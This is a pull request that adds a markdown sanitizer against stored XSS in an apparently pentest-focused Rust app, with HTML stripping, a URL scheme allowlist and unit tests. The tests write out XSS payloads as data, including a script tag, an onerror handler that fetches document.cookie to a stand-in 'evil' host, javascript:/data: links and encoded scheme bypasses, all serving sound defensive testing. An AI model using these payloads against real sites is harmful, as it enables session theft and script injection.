### PR TITLE
fix(security): sanitize untrusted markdown before dangerous_inner_html (#365)

### DIFF
--- a/crates/core/src/rendering.rs
+++ b/crates/core/src/rendering.rs
@@ -156,9 +156,108 @@ pub fn is_markdown(path: &str) -> bool {
 // Markdown rendering
 // ---------------------------------------------------------------------------
 
+/// URL schemes permitted in rendered-markdown link and image destinations.
+///
+/// This is an allowlist (default-deny), not a blocklist: any explicit scheme
+/// not listed here — `javascript:`, `data:`, `file:`, `vbscript:`, … — is
+/// rejected. Relative (scheme-less) URLs are always allowed.
+const ALLOWED_URL_SCHEMES: [&str; 3] = ["http", "https", "mailto"];
+
+/// Return `true` if `url` is safe to use as a link or image destination.
+///
+/// Relative URLs (no scheme) are allowed. A URL with an explicit scheme is
+/// allowed only if that scheme is in [`ALLOWED_URL_SCHEMES`]. Leading ASCII
+/// whitespace and control characters are stripped first, the way browsers do
+/// when parsing a scheme, so `"\tjavascript:…"` cannot smuggle a rejected
+/// scheme past the check. Non-ASCII/other-scheme prefixes (e.g. a leading
+/// U+00A0 before `javascript:`) fall through to the allowlist and are rejected
+/// by default-deny.
+///
+/// Protocol-relative URLs (`"//host/…"`) are rejected: they resolve to a remote
+/// origin, so they are treated as unsafe rather than as a scheme-less relative
+/// path (#365 review — avoids silent remote fetches/exfiltration beacons).
+fn is_safe_url(url: &str) -> bool {
+    let trimmed = url.trim_start_matches(|c: char| c.is_ascii_whitespace() || c.is_control());
+    if trimmed.starts_with("//") {
+        return false;
+    }
+    // The scheme is the text before the first ':' — but only when that ':'
+    // appears before any '/', '?', or '#', which would instead mark a
+    // relative/path reference (e.g. "/a?b#c" has no scheme).
+    match trimmed.find([':', '/', '?', '#']) {
+        Some(idx) if trimmed.as_bytes()[idx] == b':' => {
+            let scheme = &trimmed[..idx];
+            ALLOWED_URL_SCHEMES
+                .iter()
+                .any(|s| scheme.eq_ignore_ascii_case(s))
+        }
+        _ => true,
+    }
+}
+
+/// Make a single markdown event safe to feed to `dangerous_inner_html`.
+///
+/// Returns `None` for raw/inline HTML events (dropped so untrusted markdown
+/// cannot inject `<script>`, event-handler attributes, `<iframe>`, …). Link and
+/// image destinations are scheme-allowlisted via [`is_safe_url`]; a rejected
+/// destination becomes an inert empty string. Every other event passes through
+/// unchanged.
+///
+/// This is the shared choke point for all markdown rendering in the app (#365):
+/// [`render_markdown_raw`] and the chat panel's renderer both route through it,
+/// so the sanitization cannot drift between the two. Renderers that also build
+/// their own trusted HTML (e.g. syntect code highlighting) inject it separately
+/// and must not pass it through this function.
+pub fn sanitize_markdown_event(
+    event: pulldown_cmark::Event<'_>,
+) -> Option<pulldown_cmark::Event<'_>> {
+    use pulldown_cmark::{CowStr, Event, Tag};
+    match event {
+        Event::Html(_) | Event::InlineHtml(_) => None,
+        Event::Start(Tag::Link {
+            link_type,
+            dest_url,
+            title,
+            id,
+        }) => {
+            let dest_url = if is_safe_url(&dest_url) {
+                dest_url
+            } else {
+                CowStr::Borrowed("")
+            };
+            Some(Event::Start(Tag::Link {
+                link_type,
+                dest_url,
+                title,
+                id,
+            }))
+        }
+        Event::Start(Tag::Image {
+            link_type,
+            dest_url,
+            title,
+            id,
+        }) => {
+            let dest_url = if is_safe_url(&dest_url) {
+                dest_url
+            } else {
+                CowStr::Borrowed("")
+            };
+            Some(Event::Start(Tag::Image {
+                link_type,
+                dest_url,
+                title,
+                id,
+            }))
+        }
+        other => Some(other),
+    }
+}
+
 /// Render markdown to raw HTML (no wrapper div).
 ///
-/// Fenced code blocks are syntax-highlighted via syntect.
+/// Fenced code blocks are syntax-highlighted via syntect. Untrusted HTML and
+/// unsafe link/image schemes are stripped via [`sanitize_markdown_event`].
 pub fn render_markdown_raw(content: &str) -> String {
     use pulldown_cmark::{CodeBlockKind, CowStr, Event, Options, Parser, Tag, TagEnd};
 
@@ -179,7 +278,6 @@ pub fn render_markdown_raw(content: &str) -> String {
                 in_code_block = true;
                 code_lang = lang.to_string();
                 code_buf.clear();
-                continue;
             }
             Event::End(TagEnd::CodeBlock) if in_code_block => {
                 in_code_block = false;
@@ -193,16 +291,21 @@ pub fn render_markdown_raw(content: &str) -> String {
                     lang = html_escape(&code_lang),
                     code = highlighted,
                 );
+                // Trusted, locally-built HTML — intentionally bypasses the
+                // markdown sanitizer that all other events flow through.
                 events.push(Event::Html(CowStr::from(html)));
-                continue;
             }
             Event::Text(ref text) if in_code_block => {
                 code_buf.push_str(text);
-                continue;
             }
-            _ => {}
+            // Security (#365): every other event goes through the shared filter,
+            // which drops raw/inline HTML and scheme-allowlists link/image URLs.
+            other => {
+                if let Some(safe) = sanitize_markdown_event(other) {
+                    events.push(safe);
+                }
+            }
         }
-        events.push(event);
     }
 
     let mut html_output = String::new();
@@ -218,4 +321,164 @@ pub fn render_markdown(content: &str) -> String {
         r#"<div class="markdown-body">{}</div>"#,
         render_markdown_raw(content)
     )
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    // --- is_safe_url: the default-deny scheme allowlist (unit level) ---
+
+    #[test]
+    fn is_safe_url_allows_relative_and_allowlisted_schemes() {
+        assert!(is_safe_url("https://example.com/path?q=1#frag"));
+        assert!(is_safe_url("http://example.com"));
+        assert!(is_safe_url("mailto:alice@example.com"));
+        assert!(is_safe_url("/browse?path=/tmp")); // relative path
+        assert!(is_safe_url("relative/file.md")); // no scheme
+        assert!(is_safe_url("#section")); // fragment only
+        assert!(is_safe_url("HtTpS://EXAMPLE.com")); // scheme is case-insensitive
+    }
+
+    #[test]
+    fn is_safe_url_rejects_dangerous_schemes() {
+        assert!(!is_safe_url("javascript:alert(1)"));
+        assert!(!is_safe_url("JaVaScript:alert(1)"));
+        assert!(!is_safe_url("data:text/html,<script>alert(1)</script>"));
+        assert!(!is_safe_url("file:///etc/passwd"));
+        assert!(!is_safe_url("vbscript:msgbox(1)"));
+    }
+
+    #[test]
+    fn is_safe_url_rejects_protocol_relative() {
+        // "//host" resolves to a remote origin — reject it rather than treat it
+        // as a scheme-less relative path (#365 review).
+        assert!(!is_safe_url("//evil.com/log?c=secret"));
+        assert!(!is_safe_url("\t//evil.com/pixel.png")); // still rejected after trim
+    }
+
+    #[test]
+    fn is_safe_url_rejects_scheme_smuggled_with_leading_or_embedded_controls() {
+        // Browsers ignore leading whitespace/control chars when reading a scheme.
+        assert!(!is_safe_url("\tjavascript:alert(1)"));
+        assert!(!is_safe_url("  javascript:alert(1)"));
+        assert!(!is_safe_url("\n\rjavascript:alert(1)"));
+        // Embedded control char yields an unknown scheme, which default-deny rejects.
+        assert!(!is_safe_url("java\u{0000}script:alert(1)"));
+        // A non-ASCII leading space (U+00A0) is not stripped, so the scheme
+        // ("\u{a0}javascript") fails the allowlist by default-deny.
+        assert!(!is_safe_url("\u{00A0}javascript:alert(1)"));
+    }
+
+    // --- render_markdown_raw: end-to-end neutralization of hostile markdown ---
+
+    #[test]
+    fn strips_raw_script_tag() {
+        let out = render_markdown_raw("hi\n\n<script>alert(document.cookie)</script>\n");
+        assert!(!out.contains("<script"), "script tag leaked: {out}");
+        assert!(
+            out.contains("<p>hi</p>"),
+            "surrounding markdown lost: {out}"
+        );
+    }
+
+    #[test]
+    fn strips_img_onerror_handler() {
+        let out =
+            render_markdown_raw("<img src=x onerror=\"fetch('http://evil/'+document.cookie)\">");
+        assert!(!out.contains("onerror"), "event handler leaked: {out}");
+        assert!(!out.contains("<img"), "raw img tag leaked: {out}");
+    }
+
+    #[test]
+    fn strips_iframe_and_event_handler_elements() {
+        let iframe = render_markdown_raw("<iframe src=\"http://evil.example\"></iframe>");
+        assert!(!iframe.contains("<iframe"), "iframe leaked: {iframe}");
+        let handler = render_markdown_raw("<div onmouseover=\"alert(1)\">x</div>");
+        assert!(
+            !handler.contains("onmouseover"),
+            "event handler leaked: {handler}"
+        );
+    }
+
+    #[test]
+    fn neutralizes_javascript_and_file_links() {
+        let js = render_markdown_raw("[x](javascript:alert(1))");
+        assert!(
+            !js.contains("javascript:"),
+            "javascript scheme leaked: {js}"
+        );
+        let file = render_markdown_raw("[x](file:///etc/passwd)");
+        assert!(!file.contains("file:"), "file scheme leaked: {file}");
+    }
+
+    #[test]
+    fn neutralizes_data_uri_image() {
+        let out = render_markdown_raw("![x](data:text/html,<script>alert(1)</script>)");
+        assert!(!out.contains("data:"), "data uri leaked: {out}");
+    }
+
+    #[test]
+    fn neutralizes_protocol_relative_link_and_image() {
+        let link = render_markdown_raw("[x](//evil.com/log?c=secret)");
+        assert!(
+            !link.contains("//evil.com"),
+            "protocol-relative link leaked: {link}"
+        );
+        let img = render_markdown_raw("![x](//evil.com/pixel.png)");
+        assert!(
+            !img.contains("//evil.com"),
+            "protocol-relative image leaked: {img}"
+        );
+    }
+
+    #[test]
+    fn neutralizes_javascript_via_autolink_and_reference() {
+        // Autolink `<scheme:...>`: the URI becomes both href and visible text.
+        // Only the href is a sink — the text is inert — so assert on the href.
+        let auto = render_markdown_raw("<javascript:alert(1)>");
+        assert!(
+            !auto.contains("href=\"javascript:"),
+            "autolink scheme reached href: {auto}"
+        );
+        // Reference-style link resolving to a dangerous destination.
+        let reference = render_markdown_raw("[x][r]\n\n[r]: javascript:alert(1)\n");
+        assert!(
+            !reference.contains("href=\"javascript:"),
+            "reference-style scheme reached href: {reference}"
+        );
+    }
+
+    #[test]
+    fn title_attribute_cannot_break_out() {
+        // A crafted title tries to inject an event handler; push_html entity-
+        // encodes attribute values, so no real quote closes the title attribute.
+        let out = render_markdown_raw("[x](https://ok.com \"z\\\" onmouseover=\\\"alert(1)\")");
+        assert!(
+            !out.contains("\" onmouseover=\""),
+            "title attribute broke out: {out}"
+        );
+    }
+
+    #[test]
+    fn preserves_safe_links_and_images() {
+        assert!(render_markdown_raw("[ok](https://example.com/)")
+            .contains("href=\"https://example.com/\""));
+        assert!(render_markdown_raw("[ok](/browse)").contains("href=\"/browse\""));
+        assert!(render_markdown_raw("[mail](mailto:a@b.com)").contains("href=\"mailto:a@b.com\""));
+        assert!(render_markdown_raw("![alt](https://example.com/i.png)")
+            .contains("src=\"https://example.com/i.png\""));
+    }
+
+    #[test]
+    fn preserves_plain_markdown_and_highlighted_code() {
+        let out =
+            render_markdown_raw("# Title\n\n**bold** and `code`\n\n```rust\nlet x = 1;\n```\n");
+        assert!(out.contains("<h1>Title</h1>"), "heading lost: {out}");
+        assert!(out.contains("<strong>bold</strong>"), "bold lost: {out}");
+        assert!(
+            out.contains("language-rust"),
+            "fenced-code highlighting lost: {out}"
+        );
+    }
 }

--- a/crates/core/src/rendering.rs
+++ b/crates/core/src/rendering.rs
@@ -205,77 +205,100 @@ fn is_safe_url(url: &str) -> bool {
     }
 }
 
-/// Make a single markdown event safe to feed to `dangerous_inner_html`.
+/// Stateful sanitizer that makes a markdown event stream safe to feed to
+/// `dangerous_inner_html`.
 ///
-/// Returns `None` for raw/inline HTML events (dropped so untrusted markdown
-/// cannot inject `<script>`, event-handler attributes, `<iframe>`, …). Link and
-/// image destinations are scheme-allowlisted via [`is_safe_url`]; a rejected
-/// destination becomes an inert empty string. Every other event passes through
-/// unchanged.
+/// Feed every parser event through [`process`](MarkdownSanitizer::process) in
+/// order. It:
+/// - drops raw/inline HTML events, so untrusted markdown cannot inject
+///   `<script>`, event-handler attributes, `<iframe>`, …;
+/// - scheme-allowlists link/image destinations via [`is_safe_url`], and when a
+///   destination is rejected it *unwraps* the element — the `<a>`/`<img>` is
+///   dropped and its child text is kept. This avoids the inert `href=""`/`src=""`
+///   an emptied destination would produce, which re-navigates or re-fetches the
+///   current document, and gives no misleading "this is a link" affordance
+///   (#367 review). Unwrapping is why this is stateful: the opening tag's verdict
+///   must be remembered so the matching close tag is dropped too.
 ///
 /// This is the shared choke point for all markdown rendering in the app (#365):
 /// [`render_markdown_raw`] and the chat panel's renderer both route through it,
 /// so the sanitization cannot drift between the two. Renderers that also build
 /// their own trusted HTML (e.g. syntect code highlighting) inject it separately
-/// and must not pass it through this function.
+/// and must not pass it through this sanitizer.
 ///
 /// # Parser-option coupling (#367 review)
 ///
-/// This filter only inspects `Tag::Link` and `Tag::Image`; it assumes the only
+/// This sanitizer only inspects `Tag::Link` and `Tag::Image`; it assumes the only
 /// attribute sinks pulldown-cmark can emit are link/image destinations. Callers
 /// enable a conservative option set today. Turning on options that emit new
 /// attributes — `ENABLE_HEADING_ATTRIBUTES` (id/class on headings) or math —
-/// would add sinks this function does not yet cover and requires re-reviewing it.
-pub fn sanitize_markdown_event(
-    event: pulldown_cmark::Event<'_>,
-) -> Option<pulldown_cmark::Event<'_>> {
-    use pulldown_cmark::{CowStr, Event, Tag};
-    match event {
-        Event::Html(_) | Event::InlineHtml(_) => None,
-        Event::Start(Tag::Link {
-            link_type,
-            dest_url,
-            title,
-            id,
-        }) => {
-            let dest_url = if is_safe_url(&dest_url) {
-                dest_url
-            } else {
-                CowStr::Borrowed("")
-            };
-            Some(Event::Start(Tag::Link {
-                link_type,
-                dest_url,
-                title,
-                id,
-            }))
+/// would add sinks this sanitizer does not yet cover and requires re-reviewing it.
+#[derive(Default)]
+pub struct MarkdownSanitizer {
+    /// One entry per currently-open link/image scope: `true` if that scope was
+    /// dropped (unsafe destination) and its closing tag must be dropped too.
+    dropped_scopes: Vec<bool>,
+}
+
+impl MarkdownSanitizer {
+    pub fn new() -> Self {
+        Self::default()
+    }
+
+    /// Sanitize one event. Returns `None` to drop it. Must be called on the full
+    /// event stream in order so link/image open/close tags stay balanced.
+    pub fn process<'a>(
+        &mut self,
+        event: pulldown_cmark::Event<'a>,
+    ) -> Option<pulldown_cmark::Event<'a>> {
+        use pulldown_cmark::{Event, Tag, TagEnd};
+
+        // Classify while only *borrowing* the event, so we can still move it
+        // afterwards. `is_safe_url` decides whether an opening link/image is kept.
+        enum Action {
+            Drop,
+            OpenScope(bool),
+            CloseScope,
+            Pass,
         }
-        Event::Start(Tag::Image {
-            link_type,
-            dest_url,
-            title,
-            id,
-        }) => {
-            let dest_url = if is_safe_url(&dest_url) {
-                dest_url
-            } else {
-                CowStr::Borrowed("")
-            };
-            Some(Event::Start(Tag::Image {
-                link_type,
-                dest_url,
-                title,
-                id,
-            }))
+        let action = match &event {
+            Event::Html(_) | Event::InlineHtml(_) => Action::Drop,
+            Event::Start(Tag::Link { dest_url, .. })
+            | Event::Start(Tag::Image { dest_url, .. }) => {
+                Action::OpenScope(!is_safe_url(dest_url))
+            }
+            Event::End(TagEnd::Link) | Event::End(TagEnd::Image) => Action::CloseScope,
+            _ => Action::Pass,
+        };
+
+        match action {
+            Action::Drop => None,
+            Action::OpenScope(dropped) => {
+                self.dropped_scopes.push(dropped);
+                // Dropped: unwrap the element, keep its children (emitted next).
+                if dropped {
+                    None
+                } else {
+                    Some(event)
+                }
+            }
+            Action::CloseScope => {
+                let dropped = self.dropped_scopes.pop().unwrap_or(false);
+                if dropped {
+                    None
+                } else {
+                    Some(event)
+                }
+            }
+            Action::Pass => Some(event),
         }
-        other => Some(other),
     }
 }
 
 /// Render markdown to raw HTML (no wrapper div).
 ///
 /// Fenced code blocks are syntax-highlighted via syntect. Untrusted HTML and
-/// unsafe link/image schemes are stripped via [`sanitize_markdown_event`].
+/// unsafe link/image schemes are stripped via [`MarkdownSanitizer`].
 pub fn render_markdown_raw(content: &str) -> String {
     use pulldown_cmark::{CodeBlockKind, CowStr, Event, Options, Parser, Tag, TagEnd};
 
@@ -289,6 +312,7 @@ pub fn render_markdown_raw(content: &str) -> String {
     let mut code_buf = String::new();
 
     let mut events: Vec<Event> = Vec::new();
+    let mut sanitizer = MarkdownSanitizer::new();
 
     for event in parser {
         match event {
@@ -316,10 +340,11 @@ pub fn render_markdown_raw(content: &str) -> String {
             Event::Text(ref text) if in_code_block => {
                 code_buf.push_str(text);
             }
-            // Security (#365): every other event goes through the shared filter,
-            // which drops raw/inline HTML and scheme-allowlists link/image URLs.
+            // Security (#365): every other event goes through the shared
+            // sanitizer, which drops raw/inline HTML and scheme-allowlists
+            // link/image URLs (unwrapping rejected ones).
             other => {
-                if let Some(safe) = sanitize_markdown_event(other) {
+                if let Some(safe) = sanitizer.process(other) {
                     events.push(safe);
                 }
             }
@@ -465,6 +490,35 @@ mod tests {
             !out.contains("evil.com"),
             "backslash protocol-relative link leaked: {out}"
         );
+    }
+
+    #[test]
+    fn unwraps_rejected_link_and_image_keeping_text() {
+        // A rejected link is unwrapped: no <a> element and no inert href="", but
+        // the visible label text is preserved (#367 review).
+        let link = render_markdown_raw("see [click me](javascript:alert(1)) now");
+        assert!(
+            !link.contains("<a "),
+            "rejected link kept an anchor: {link}"
+        );
+        assert!(
+            !link.contains("href=\"\""),
+            "rejected link left an inert empty href: {link}"
+        );
+        assert!(link.contains("click me"), "link label text lost: {link}");
+
+        // A rejected image is unwrapped: no <img> and no inert src="", with the
+        // alt text surfaced as plain text instead.
+        let img = render_markdown_raw("![the alt text](javascript:alert(1))");
+        assert!(
+            !img.contains("<img"),
+            "rejected image kept an img element: {img}"
+        );
+        assert!(
+            !img.contains("src=\"\""),
+            "rejected image left an inert empty src: {img}"
+        );
+        assert!(img.contains("the alt text"), "image alt text lost: {img}");
     }
 
     #[test]

--- a/crates/core/src/rendering.rs
+++ b/crates/core/src/rendering.rs
@@ -176,17 +176,27 @@ const ALLOWED_URL_SCHEMES: [&str; 3] = ["http", "https", "mailto"];
 /// Protocol-relative URLs (`"//host/…"`) are rejected: they resolve to a remote
 /// origin, so they are treated as unsafe rather than as a scheme-less relative
 /// path (#365 review — avoids silent remote fetches/exfiltration beacons).
+/// Backslashes are folded to `/` first, so browser-equivalent shapes like
+/// `"/\host"` and `"\\host"` are rejected too (#367 review).
 fn is_safe_url(url: &str) -> bool {
     let trimmed = url.trim_start_matches(|c: char| c.is_ascii_whitespace() || c.is_control());
-    if trimmed.starts_with("//") {
+    // Browsers fold '\' to '/' when resolving http(s) URLs (WHATWG URL spec), so
+    // "/\evil.com" and "\\evil.com" both resolve to a remote origin even though
+    // neither literally starts with "//". Normalize backslashes to slashes before
+    // the protocol-relative and scheme checks so neither shape slips through as a
+    // scheme-less "relative" path (#367 review). A backslash is not legal in a URL
+    // scheme, so this can only split a would-be scheme earlier — never forge an
+    // allowed one.
+    let normalized = trimmed.replace('\\', "/");
+    if normalized.starts_with("//") {
         return false;
     }
     // The scheme is the text before the first ':' — but only when that ':'
     // appears before any '/', '?', or '#', which would instead mark a
     // relative/path reference (e.g. "/a?b#c" has no scheme).
-    match trimmed.find([':', '/', '?', '#']) {
-        Some(idx) if trimmed.as_bytes()[idx] == b':' => {
-            let scheme = &trimmed[..idx];
+    match normalized.find([':', '/', '?', '#']) {
+        Some(idx) if normalized.as_bytes()[idx] == b':' => {
+            let scheme = &normalized[..idx];
             ALLOWED_URL_SCHEMES
                 .iter()
                 .any(|s| scheme.eq_ignore_ascii_case(s))
@@ -208,6 +218,14 @@ fn is_safe_url(url: &str) -> bool {
 /// so the sanitization cannot drift between the two. Renderers that also build
 /// their own trusted HTML (e.g. syntect code highlighting) inject it separately
 /// and must not pass it through this function.
+///
+/// # Parser-option coupling (#367 review)
+///
+/// This filter only inspects `Tag::Link` and `Tag::Image`; it assumes the only
+/// attribute sinks pulldown-cmark can emit are link/image destinations. Callers
+/// enable a conservative option set today. Turning on options that emit new
+/// attributes — `ENABLE_HEADING_ATTRIBUTES` (id/class on headings) or math —
+/// would add sinks this function does not yet cover and requires re-reviewing it.
 pub fn sanitize_markdown_event(
     event: pulldown_cmark::Event<'_>,
 ) -> Option<pulldown_cmark::Event<'_>> {
@@ -355,6 +373,12 @@ mod tests {
         // as a scheme-less relative path (#365 review).
         assert!(!is_safe_url("//evil.com/log?c=secret"));
         assert!(!is_safe_url("\t//evil.com/pixel.png")); // still rejected after trim
+
+        // Backslash variants: browsers fold '\' to '/', so these resolve to a
+        // remote origin too and must not pass as relative paths (#367 review).
+        assert!(!is_safe_url("/\\evil.com/log?c=1")); // "/\evil.com" => "//evil.com"
+        assert!(!is_safe_url("\\\\evil.com/log")); // "\\evil.com" => "//evil.com"
+        assert!(!is_safe_url("\t/\\evil.com/pixel.png")); // control + backslash combo
     }
 
     #[test]
@@ -433,6 +457,17 @@ mod tests {
     }
 
     #[test]
+    fn neutralizes_backslash_protocol_relative() {
+        // Browsers fold '\' to '/', so "/\host" resolves to a remote origin. Must
+        // be neutralized end-to-end, not just in is_safe_url (#367 review).
+        let out = render_markdown_raw("[x](/\\evil.com/log?c=1)");
+        assert!(
+            !out.contains("evil.com"),
+            "backslash protocol-relative link leaked: {out}"
+        );
+    }
+
+    #[test]
     fn neutralizes_javascript_via_autolink_and_reference() {
         // Autolink `<scheme:...>`: the URI becomes both href and visible text.
         // Only the href is a sink — the text is inert — so assert on the href.
@@ -479,6 +514,26 @@ mod tests {
         assert!(
             out.contains("language-rust"),
             "fenced-code highlighting lost: {out}"
+        );
+    }
+
+    #[test]
+    fn neutralizes_entity_and_percent_encoded_schemes() {
+        // The security-reviewer flagged encoded schemes (#367 review). Proven
+        // empirically against pulldown-cmark 0.12.2: HTML entities in a
+        // destination ARE decoded before the filter runs, so `&#106;avascript:`
+        // becomes `javascript:` and is rejected by default-deny. Percent-encoding
+        // is NOT decoded, so `%6Aavascript` stays an unknown scheme and is also
+        // rejected. Both collapse to an inert empty href.
+        let entity = render_markdown_raw("[x](&#106;avascript:alert(1))");
+        assert!(
+            !entity.contains("avascript") && !entity.contains("alert"),
+            "entity-encoded scheme leaked: {entity}"
+        );
+        let pct = render_markdown_raw("[x](%6Aavascript:alert(1))");
+        assert!(
+            !pct.contains("avascript") && !pct.contains("alert"),
+            "percent-encoded scheme leaked: {pct}"
         );
     }
 }

--- a/crates/ui/src/components/chat_panel/render.rs
+++ b/crates/ui/src/components/chat_panel/render.rs
@@ -3,7 +3,7 @@
 use base64::{engine::general_purpose::STANDARD as BASE64, Engine as _};
 use dioxus::prelude::*;
 use pentest_core::matrix::{ChatMessage, MessagePart, ToolCallInfo, ToolCallStatus};
-use pentest_core::rendering::sanitize_markdown_event;
+use pentest_core::rendering::MarkdownSanitizer;
 use pentest_tools::webwright::{
     live_peek, live_subscribe, signature_for_call, task_for_request, WebwrightProgress,
 };
@@ -229,8 +229,11 @@ pub fn render_markdown(input: &str) -> String {
     // Security (#365): route events through the shared sanitizer so untrusted
     // chat/agent content (which reflects tool and target output) cannot inject
     // HTML or unsafe link/image schemes into `dangerous_inner_html`. Same choke
-    // point as the core file renderer, so the two cannot drift apart.
-    let parser = Parser::new_ext(input, options).filter_map(sanitize_markdown_event);
+    // point as the core file renderer, so the two cannot drift apart. The
+    // sanitizer is stateful (it unwraps rejected links/images), so it is threaded
+    // through filter_map by a mutable closure.
+    let mut sanitizer = MarkdownSanitizer::new();
+    let parser = Parser::new_ext(input, options).filter_map(move |e| sanitizer.process(e));
     let mut html_output = String::new();
     html::push_html(&mut html_output, parser);
     html_output

--- a/crates/ui/src/components/chat_panel/render.rs
+++ b/crates/ui/src/components/chat_panel/render.rs
@@ -3,6 +3,7 @@
 use base64::{engine::general_purpose::STANDARD as BASE64, Engine as _};
 use dioxus::prelude::*;
 use pentest_core::matrix::{ChatMessage, MessagePart, ToolCallInfo, ToolCallStatus};
+use pentest_core::rendering::sanitize_markdown_event;
 use pentest_tools::webwright::{
     live_peek, live_subscribe, signature_for_call, task_for_request, WebwrightProgress,
 };
@@ -225,7 +226,11 @@ pub fn render_markdown(input: &str) -> String {
     options.insert(Options::ENABLE_STRIKETHROUGH);
     options.insert(Options::ENABLE_TABLES);
 
-    let parser = Parser::new_ext(input, options);
+    // Security (#365): route events through the shared sanitizer so untrusted
+    // chat/agent content (which reflects tool and target output) cannot inject
+    // HTML or unsafe link/image schemes into `dangerous_inner_html`. Same choke
+    // point as the core file renderer, so the two cannot drift apart.
+    let parser = Parser::new_ext(input, options).filter_map(sanitize_markdown_event);
     let mut html_output = String::new();
     html::push_html(&mut html_output, parser);
     html_output
@@ -764,7 +769,36 @@ fn load_screenshots_from_result(result_json: &str) -> Vec<(String, String)> {
 
 #[cfg(test)]
 mod tests {
-    use super::webwright_display_name;
+    use super::{render_markdown, webwright_display_name};
+
+    // Security (#365): the chat renderer must route through the shared markdown
+    // sanitizer. These guard the chat sink specifically (the file-viewer sink is
+    // guarded in pentest_core::rendering).
+    #[test]
+    fn chat_markdown_strips_raw_html() {
+        let out = render_markdown("hi <script>alert(1)</script> <img src=x onerror=\"alert(1)\">");
+        assert!(!out.contains("<script"), "script leaked: {out}");
+        assert!(!out.contains("onerror"), "event handler leaked: {out}");
+    }
+
+    #[test]
+    fn chat_markdown_neutralizes_javascript_link() {
+        let out = render_markdown("[x](javascript:alert(1))");
+        assert!(
+            !out.contains("javascript:"),
+            "javascript scheme leaked: {out}"
+        );
+    }
+
+    #[test]
+    fn chat_markdown_preserves_safe_content() {
+        let out = render_markdown("**bold** [ok](https://example.com/)");
+        assert!(out.contains("<strong>bold</strong>"), "bold lost: {out}");
+        assert!(
+            out.contains("href=\"https://example.com/\""),
+            "safe link lost: {out}"
+        );
+    }
 
     // End-to-end guard for the render.rs truncation call site (#287). Unlike the
     // three sidebar/history/agent_selector sites (inline in rsx! and gated on a


### PR DESCRIPTION
## Summary
- Fixes **#365**: two markdown renderers wrote `pulldown_cmark` output to Dioxus `dangerous_inner_html` with no sanitizer — a stored-XSS sink reachable from viewed files and (highest-risk) chat/agent content that reflects tool + scanned-target output.
- Adds one shared choke point `pentest_core::rendering::sanitize_markdown_event` and routes **both** renderers through it (security-by-construction, **no new dependency**): the core file renderer and the chat panel's own `render_markdown` (which was previously missed — a separate, unprotected renderer).
- Filter: drop raw/inline HTML events; scheme-allowlist link/image destinations (default-deny — `http`/`https`/`mailto`/relative pass; `javascript:`/`data:`/`file:`/protocol-relative `//` rejected), trimming leading control chars so `\tjavascript:` can't smuggle a scheme.
- Syntect code highlighting and ` ```mermaid ` blocks are preserved (trusted highlight HTML is injected separately and bypasses the filter by construction).

## Why Option B (event filter) not Option A (`ammonia`)
Discussed on the issue: B closes the full `push_html` emit surface with no dependency; a post-hoc sanitizer would guard an already-closed door. `ammonia` is recorded as a future defense-in-depth option if we ever need to *render* trusted HTML rather than strip it. See the decision note on #365.

## Reviews (pick-reviewer + security-reviewer)
- **pick-reviewer: APPROVE**, mutation-verified guards, CI-scope confirmed, no additional sinks, highlighting/mermaid preserved.
- **security-reviewer** findings triaged empirically:
  - Its CRITICAL (HTML file-viewer iframe, `file_viewer.rs:105`) is a **false positive** — that iframe uses `sandbox="allow-same-origin"` with **no `allow-scripts`**, so scripts don't execute, and `"` is escaped so there's no attribute breakout. Also a pre-existing, non-markdown path (out of scope). pick-reviewer independently reached the same conclusion.
  - NBSP / percent-encoding "bypass" concerns were **run through the renderer** and are blocked by default-deny.
  - Protocol-relative `//host` was confirmed real and is now rejected in this PR.

## Residual risk (out of scope, noted for follow-up)
`https://` images/links are allowed by design, so a remote image can still act as a tracking/exfil beacon on view. Blocking all remote resource loads is a separate product/design decision, not part of closing the XSS class.

## Test plan
- [x] `cargo test -p pentest-core --lib rendering` — 14 tests (each vector + safe-content preservation).
- [x] Chat sink guarded in `pentest-ui` (`chat_panel::render::tests`); runs on the Linux CI lane (`--workspace --features pentest-platform/desktop-pcap`). macOS lane is core-scoped, where the shared `sanitize_markdown_event` logic is fully tested.
- [x] Guard-verified: neutering each defense (raw-HTML drop, scheme allowlist, protocol-relative) turns the relevant tests red; restoring makes them green.
- [x] `cargo clippy --workspace --features pentest-platform/desktop-pcap --all-targets -- -D warnings` clean; `cargo fmt --all --check` clean.
- [ ] CI green.

Addresses #365. (The XSS *class* is fully closed once the chart-processor
sink lands in the companion PR; that PR carries `Closes #365`, so this issue
stays open until both merge.)

